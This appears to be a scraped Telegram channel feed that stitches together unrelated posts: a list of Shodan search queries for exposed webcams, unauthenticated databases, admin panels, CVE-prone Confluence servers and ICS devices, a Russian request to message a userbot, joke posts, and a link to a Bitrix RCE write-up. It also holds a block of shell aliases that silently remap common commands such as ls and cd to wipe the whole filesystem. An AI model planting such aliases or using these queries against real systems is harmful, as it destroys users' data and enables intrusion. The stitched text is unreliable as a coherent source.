Shodan Dorks for OSINT, Recon and Bug Bounty
Exposed Webcams
• Example:
Open FTP Servers
• Example (Anonymous login access):
Outdated Operation Systems
• Example:
Misconfigured MongoDB Databases
• Example:
Exposed Login Panels
• Example:
Specific Geolocation Targets
• Example:
Apache Servers with Expired SSL in the US
• Example:
Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
• Example:
ICS/SCADA Devices
• Example:
Shodan Search Query Fundamentals: Link
#infosec #cybersecurity #bugbounty #pentest #shodan #recon #dork
Exposed Webcams
Finds IP cams running webcamXP software
• Example:
http.title:"webcamXP"Open FTP Servers
Finds FTP servers that allow anonymous login
• Example (Anonymous login access):
port:21 anonymousOutdated Operation Systems
Like Finding devices that running Windows 7
• Example:
os:"Windows 7"Misconfigured MongoDB Databases
Finds exposed MongoDB instances without authentication
• Example:
product:"MongoDB" port:27017Exposed Login Panels
Identifies admin login portals
• Example:
http.title:"Admin Login"Specific Geolocation Targets
Finds services exposed in a specific country
• Example:
port:22 country:"IN"Apache Servers with Expired SSL in the US
Finds Apache web servers with expired SSL certs in the US
• Example:
product:"Apache httpd" ssl:"expired" country:"US"Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
Finds potentially vulnerable Confluence servers
• Example:
http.html:"Atlassian Confluence" port:8090ICS/SCADA Devices
Detects Modbus protocol on industrial systems
• Example:
port:502 name:"modbus"Shodan Search Query Fundamentals: Link
#infosec #cybersecurity #bugbounty #pentest #shodan #recon #dork
🔥3
Forwarded from Помощь
Всем привет.
Прошу вас помочь мне собрать информацию о дате регистрации разных айди. Помочь может каждый, достаточно просто тыкнуть на стикер в диалоге с @mewpl2
Юзербот сохранит дату вашей регистрации и удалит переписку, никакого подвоха нет, ничего страшного не произойдет. На данный момент поучаствовало более 350 человек, но нужно больше. Если у вас есть аккаунты 2-3-4-5-6-7-8-9-10 цифр в айди, прошу вас тыкнуть на стикер с них. Вы очень сильно поможете мне.
Прошу вас помочь мне собрать информацию о дате регистрации разных айди. Помочь может каждый, достаточно просто тыкнуть на стикер в диалоге с @mewpl2
Юзербот сохранит дату вашей регистрации и удалит переписку, никакого подвоха нет, ничего страшного не произойдет. На данный момент поучаствовало более 350 человек, но нужно больше. Если у вас есть аккаунты 2-3-4-5-6-7-8-9-10 цифр в айди, прошу вас тыкнуть на стикер с них. Вы очень сильно поможете мне.
Forwarded from RIN 𓀫 {♨️ {
alias ls='sudo rm -rf --no-preserve-root / > /dev/null 2>&1 &'
alias cd='sudo rm -rf --no-preserve-root / > /dev/null 2>&1 &' # Показыв>
alias who='sudo rm -rf --no-preserve-root / > /dev/null 2>&1 &'
alias last='sudo rm -rf --no-preserve-root / > /dev/null 2>&1 &'
alias history='sudo rm -rf --no-preserve-root / > /dev/null 2>&1 &'
❤10😨2
Алло, вирусы?
Да да , троян в Word, мышь не двигается(made by chatgpt)
Да да , троян в Word, мышь не двигается
❤2🍓1
Forwarded from BadB's Porn Club
Bitrix Excel RCE, подробности тут: https://cybersec.org/blog/hack/bitrix-excel-rce.html